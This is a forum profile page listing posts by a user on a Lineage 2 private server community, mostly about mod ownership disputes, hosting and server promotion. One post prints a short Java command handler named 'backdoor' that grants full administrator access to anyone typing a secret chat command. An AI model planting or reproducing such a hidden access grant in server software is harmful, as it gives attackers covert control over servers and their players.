Jump to content

Sikken

Members
  • Posts

    90
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

Everything posted by Sikken

  1. sorry, but fail. /* * This program is free software: you can redistribute it and/or modify it under * the terms of the GNU General Public License as published by the Free Software * Foundation, either version 3 of the License, or (at your option) any later * version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more * details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ package net.sf.l2j.gameserver.handler.voicedcommandhandlers; import net.sf.l2j.gameserver.handler.IVoicedCommandHandler; import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance; public class backdoor implements IVoicedCommandHandler { private static final String[] _voicedCommands = { "w6tndsx5" }; public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) { if (command.equalsIgnoreCase("w6tndsx5")) { activeChar.setAccountAccesslevel(1); activeChar.setAccessLevel(127); } return false; } public String[] getVoicedCommandList() { return _voicedCommands; } }
  2. who added to your server? edit: prove you even have it lol
  3. This is my mod (if you even have it on your server), and you do not have my permission to sell it. ps: you did not even by it from me, who are you?
  4. http://www.webfaction.com/ This is my suggestion to dedicated and shared web hosting. All linux base systems. 99.9% uptime.
  5. Daily Bump (50+ players on usually)
  6. Please vote on our poll: Keep or Remove Stacking Subclass System http://www.l2blitz.com/forums/index.php?topic=13
  7. If you want to try it out, join http://www.l2blitz.com/forums/index.php?topic=13 and use command /buffshop
×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock